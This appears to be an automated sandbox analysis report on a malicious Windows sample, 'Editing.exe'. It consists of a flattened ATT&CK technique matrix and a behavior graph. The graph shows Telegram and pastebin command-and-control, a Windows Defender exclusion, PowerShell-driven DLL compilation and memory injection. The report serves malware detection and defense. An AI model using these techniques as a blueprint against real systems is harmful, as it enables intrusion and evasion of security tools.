ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation		1
DLL Side-Loading		111
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		11
Disable or Modify Tools		LSASS Memory121
Security Software Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)131
Virtualization/Sandbox Evasion		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS131
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617330 Sample: Editing.exe Startdate: 17/02/2025 Architecture: WINDOWS Score: 100 37 pastebin.com 2->37 39 api.telegram.org 2->39 41 2 other IPs or domains 2->41 51 Suricata IDS alerts for network traffic 2->51 53 Antivirus detection for URL or domain 2->53 55 Multi AV Scanner detection for submitted file 2->55 61 7 other signatures 2->61 9 Editing.exe 11 2->9         started        signatures3 57 Connects to a pastebin service (likely for C&C) 37->57 59 Uses the Telegram API (likely for C&C communication) 39->59 process4 dnsIp5 43 ip-api.com 208.95.112.1, 51663, 80 TUT-ASUS United States 9->43 45 api.telegram.org 149.154.167.220, 443, 51668, 51881 TELEGRAMRU United Kingdom 9->45 47 2 other IPs or domains 9->47 63 Adds a directory exclusion to Windows Defender 9->63 13 powershell.exe 14 24 9->13         started        18 powershell.exe 23 9->18         started        20 powershell.exe 9->20         started        signatures6 process7 dnsIp8 49 pastebin.com 104.20.3.235, 443, 49706 CLOUDFLARENETUS United States 13->49 35 C:\Users\user\AppData\...\fri53hgi.cmdline, Unicode 13->35 dropped 65 Writes to foreign memory regions 13->65 22 csc.exe 3 13->22         started        25 conhost.exe 13->25         started        67 Loading BitLocker PowerShell Module 18->67 27 conhost.exe 18->27         started        29 conhost.exe 20->29         started        file9 signatures10 process11 file12 33 C:\Users\user\AppData\Local\...\fri53hgi.dll, PE32 22->33 dropped 31 cvtres.exe 1 22->31         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.